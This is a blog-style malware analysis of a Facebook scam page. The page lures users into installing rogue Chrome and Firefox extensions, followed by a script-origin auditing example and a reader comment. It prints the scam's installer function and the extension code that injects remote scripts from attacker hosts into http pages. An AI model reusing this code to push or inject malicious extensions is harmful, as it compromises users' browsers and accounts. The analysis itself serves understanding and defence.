Recently a couple of my friends were affected by a rogue app that posted crap using their accounts, and I was a bit curious how everything worked. Typically these things are so short-lived that by the time I get to see them they are gone from the face of the internet. But this time...
Luckily, today another of my friends *liked* one such shit, so let's see how it works...
First off, it links to an exact Facebook look-alike page: http://kustuntuniya.blogspot.com/?3
The page is an exact look-alike; however, the lazy fellows didn't bother to make all the links work. The header is just a div element with a CSS background image:
```css
background: url("http://i55.tinypic.com/jpj7fl.jpg") no-repeat scroll center top #3B5998;
```
Similarly, the bottom part is another image: http://i.imgur.com/ZJLcI.jpg
Now, it's the middle part that is actually interesting.
The whole dark area is an iframe containing the page http://installplug.info/girlplugin.html
The page has all the elements and the button-like anchor tag, "Install Plugin", with the following code:
```html
<a class="install nomargin" onclick="instalar();">Install Plugin</a>
```
So it calls our beloved instalar function in JavaScript, which is found above in a script tag.
The next two lines sniff the browser type, to install the XPI add-on for Firefox or the CRX add-on for Google Chrome:
```javascript
var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1;
var is_firefox = navigator.userAgent.toLowerCase().indexOf('firefox') > -1;

function instalar()
{
  // Installs the Chrome add-on
  if ( is_chrome ){
    window.open("http://installplug.info/youtube.crx");
  }
  else if ( is_firefox ) {
    var params = {
      "Youtube Extension": {
        URL: "http://installplug.info/youtube.xpi",
        toString: function () { return this.URL; }
      }
    };
    // Installs the Firefox add-on
    InstallTrigger.install(params);
  }
  else{
    window.open("http://installplug.info/shirt/complete.php");
  }
}
```
At this point the browser has been successfully compromised with a damned extension, installed with the gullible user's explicit permission!!!
Now to the damned browser extensions. It's getting late, but tonight I'd rather give in to curiosity....
So I downloaded and extracted both plugins. The extensions use YouTube icons to keep the user fooled.
Both browser plugins do the same thing. When the user visits any page, the plugin first checks whether it is a protected (https) page or not. If it is protected, it does nothing:
```javascript
if ('https:' == document.location.protocol) return false;
```
If the page is a normal (http) page, it injects its own script as a child of the head:
```javascript
var s = document.createElement('script');
s.setAttribute("type","text/javascript");
s.setAttribute("src", "http://installplug.info/script.js");
// This line is not in the extracted snippet; the post describes the element being appended to <head>
document.getElementsByTagName('head')[0].appendChild(s);
```
Now, I've got to download another script to see the actual rascal.
And here I go again: the file has code to download yet another script and inject that one into the same page...
```javascript
s.setAttribute("src", "http://munishocks.info/new/extra.js");
```
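The injection chain above is what a page-side check would look for: a remote script loader that is not the site's own. The following is an added example (not code from the post or from the extension) that classifies script sources by origin and, in a browser, watches for scripts appended at runtime; the allowlist hosts, example.com and the function names are assumptions.

```javascript
// Added example (not from the original post or the extension): audit the
// <script> srcs on a page and flag remote loaders like the one above.
// Runs under Node using the WHATWG URL class; the allowlist is hypothetical.
const ALLOWED_HOSTS = new Set(['connect.facebook.net', 'www.google-analytics.com']);

function classifyScriptSrc(src, pageUrl, allowedHosts = ALLOWED_HOSTS) {
  const page = new URL(pageUrl);
  let target;
  try {
    target = new URL(src, page.href); // resolve relative srcs against the page
  } catch (e) {
    return { src, verdict: 'malformed' };
  }
  if (target.origin === page.origin) return { src, verdict: 'first-party' };
  if (allowedHosts.has(target.hostname)) return { src, verdict: 'allowed-third-party' };
  // An http: script on an https: page is blocked as mixed content by modern
  // browsers; report it separately from a third-party script that would load.
  const mixed = page.protocol === 'https:' && target.protocol === 'http:';
  return { src, verdict: mixed ? 'mixed-content' : 'suspicious-third-party', host: target.hostname };
}

// Return only the scripts worth a look.
function auditScripts(srcs, pageUrl) {
  return srcs
    .map((s) => classifyScriptSrc(s, pageUrl))
    .filter((r) => r.verdict !== 'first-party' && r.verdict !== 'allowed-third-party');
}

// In a browser, watch for scripts appended at runtime (the extension's method).
function watchInjectedScripts(onSuspicious) {
  if (typeof MutationObserver === 'undefined' || typeof document === 'undefined') return null;
  const observer = new MutationObserver((mutations) => {
    for (const m of mutations) {
      for (const node of m.addedNodes) {
        if (node.nodeName !== 'SCRIPT' || !node.src) continue;
        const r = classifyScriptSrc(node.src, document.location.href);
        if (r.verdict === 'suspicious-third-party' || r.verdict === 'mixed-content') onSuspicious(r);
      }
    }
  });
  observer.observe(document.documentElement, { childList: true, subtree: true });
  return observer;
}

// Constructed sample: script srcs seen on an http page after the extension ran.
const SAMPLE_SRCS = ['/static/app.js', 'http://connect.facebook.net/en_US/all.js',
  'http://installplug.info/script.js', 'http://munishocks.info/new/extra.js'];
console.log(auditScripts(SAMPLE_SRCS, 'http://example.com/profile'));
```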
The trail went cold here... I'm unable to download the new file. Maybe I'm late once again. Next time, send it to me SOOOON.
Thanks for this useful post, this is the only result when I search about http://munishocks.info/new/extra.js, coz this js keeps on appearing on my offline site error when I turn on the web console of my gchrome.. I also experienced this kind of spam a few months ago...
www.wapdabarkads.co.cc